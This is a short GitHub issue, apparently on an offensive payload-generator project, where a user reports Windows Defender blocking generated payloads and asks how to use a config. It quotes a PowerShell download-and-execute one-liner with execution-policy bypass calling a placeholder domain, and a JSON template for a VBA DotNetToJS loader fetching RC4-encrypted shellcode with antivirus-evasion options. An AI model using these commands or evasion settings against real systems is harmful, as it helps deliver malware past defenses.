Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

WD runtime #16

Open
moaeddy opened this issue Jun 12, 2019 · 0 comments
Open

WD runtime #16

moaeddy opened this issue Jun 12, 2019 · 0 comments

Comments

@moaeddy
Copy link

moaeddy commented Jun 12, 2019

windows defender is blocking

generic-cmd.json

generic-cmd2.json

wmi-cmd.json

in runtime, using powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https:/domain/file/the.ps1')""

also how do one make use of this

{
"description": "DotnettoJS with RC4 encrypted payload\nEvasion technique set to domain check",
"template": "templates/payloads/dotnettojs-evasion-template.vba",
"varcount": 150,
"encodingoffset": 4,
"chunksize": 200,
"encodedvars": {

                            "DOMAIN":"TEST",
                            "URL_X86":"https://RC4.encrypted.base64.shellcode.32.bit/?1=1",
                            "URL_X64":"https://RC4.encrypted.base64.shellcode.64.bit/?1=3",
                            "DECRYPTION_KEY":"RC4.base64.decryption.key",
                            "WAIT_TIME":"4294967295"

                    },
    "vars": [],
    "evasion":      ["encoder", "domain"],
    "payload": "cmd.exe /c calc.exe"

}

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant